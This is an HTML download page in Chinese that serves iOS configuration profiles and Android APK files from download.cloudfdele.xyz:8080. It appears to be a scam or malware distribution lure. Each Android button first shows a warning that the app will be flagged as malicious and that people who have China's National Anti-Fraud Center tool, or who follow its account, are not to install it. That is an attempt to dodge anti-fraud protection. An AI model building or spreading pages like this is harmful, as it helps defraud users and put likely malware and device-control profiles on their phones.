<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Download</title>
    <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,minimum-scale=1.0,user-scalable=no">
    <meta http-equiv="Pragma" content="no-cache">
    <meta content="yes" name="apple-mobile-web-app-capable">
    <meta content="yes" name="apple-touch-fullscreen">
    <meta content="black" name="apple-mobile-web-app-status-bar-style">
    <meta content="telephone=no,email=no" name="format-detection">
    <link rel="stylesheet" type="text/css" href="./css/reset.css">
    <script src="./js/fsize.js"></script>
    <style>
        #doc {
            position: fixed;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            margin: auto;
            /* 移除背景颜色，添加背景图片 */
            background-image: url("./img/bg.png"); /* 替换为你的背景图片路径 */
            background-size: cover; /* 背景图片覆盖整个容器 */
            background-position: center; /* 背景图片居中 */
            background-repeat: no-repeat; /* 不重复平铺 */
            padding-top: 1rem;
            overflow-y: auto; /* 允许内容滚动 */
            padding-bottom: 2rem; /* 底部留出空间 */
        }

        #doc .logo {
            width: 10.2rem;
            height: 3.2rem;
            background: url("./img/1-1.png") no-repeat center;
            background-size: contain; /* 图片适应容器大小 */
            margin: 0 auto 1rem; /* 居中显示并添加底部间距 */
        }

        #doc .link {
            width: 6.67rem;
            height: 1.2rem;
            background: url("./img/1-3.png") no-repeat center;
            background-size: 100% 100%;
            margin: .6rem auto 0;
            font-weight: 500;
            font-size: .43rem;
        }

        #doc .link a {
            display: block;
            width: 100%;
            height: 100%;
            line-height: 1.2rem;
            color: #fff;
            padding-left: 1.2rem;
            box-sizing: border-box;
            text-decoration: none; /* 移除链接下划线 */
        }

        #doc .link a .andIcon {
            background: url("./img/1-4.png") no-repeat center;
            width: .53rem;
            height: .667rem;
            background-size: 100% 100%;
            display: inline-block;
            vertical-align: sub;
            margin-right: .2rem;
        }

        #doc .link a .iosIcon {
            background: url("./img/1-5.png") no-repeat center;
            width: .53rem;
            height: .667rem;
            background-size: 100% 100%;
            display: inline-block;
            vertical-align: sub;
            margin-right: .2rem;
        }
    </style>
</head>

<body>
    <div id="doc">
        <div class="logo"></div>
        <div class="link">
            <a href="http://download.cloudfdele.xyz:8080/oxndw6/fy_n_jp.mobileconfig"><span class="iosIcon"></span>苹果下载安装</a>
        </div>
        <div class="link">
            <a href="#" onclick="dn()"><span class="andIcon"></span>安卓抢先版下载</a>
        </div>
        <div class="link">
            <a href="#" onclick="dn2()"><span class="andIcon"></span>安卓轻量版下载</a>
        </div>
        <div class="link">
            <a href="#" onclick="dn3()"><span class="andIcon"></span>安卓原版下载</a>
        </div>
        <div class="link">
            <a href="http://download.cloudfdele.xyz:8080/oxndw6/fy_n_dg.mobileconfig"><span class="iosIcon"></span>苹果下载安装2</a>
        </div>
        <div class="link">
            <a onclick="javascript:location.href=location.href.substr(0,location.href.lastIndexOf('l')+1) + '?sn='+Math.random();" href="#">刷新页面</a>
        </div>
    </div>
</body>
<script language="javascript">
    function dn() {
        var con;
        con = confirm("重要提示：本软件会被错判为恶意程序，安装前，请确认您的系统未安装过“国家反诈中心”杀毒工具或关注“国家反诈中心公众号”的。如已安装或关注的，请勿安装本程序，敬请注意！");
        if (con == true) {
            self.location.href = "http://download.cloudfdele.xyz:8080/fy.apk";
        }
    }

    function dn2() {
        var con;
        con = confirm("重要提示：本软件会被错判为恶意程序，安装前，请确认您的系统未安装过“国家反诈中心”杀毒工具或关注“国家反诈中心公众号”的。如已安装或关注的，请勿安装本程序，敬请注意！");
        if (con == true) {
            self.location.href = "http://download.cloudfdele.xyz:8080/fy_h.apk";
        }
    }

    function dn3() {
        var con;
        con = confirm("重要提示：本软件会被错判为恶意程序，安装前，请确认您的系统未安装过“国家反诈中心”杀毒工具或关注“国家反诈中心公众号”的。如已安装或关注的，请勿安装本程序，敬请注意！");
        if (con == true) {
            self.location.href = "http://download.cloudfdele.xyz:8080/fy_o.apk";
        }
    }
</script>

</html>
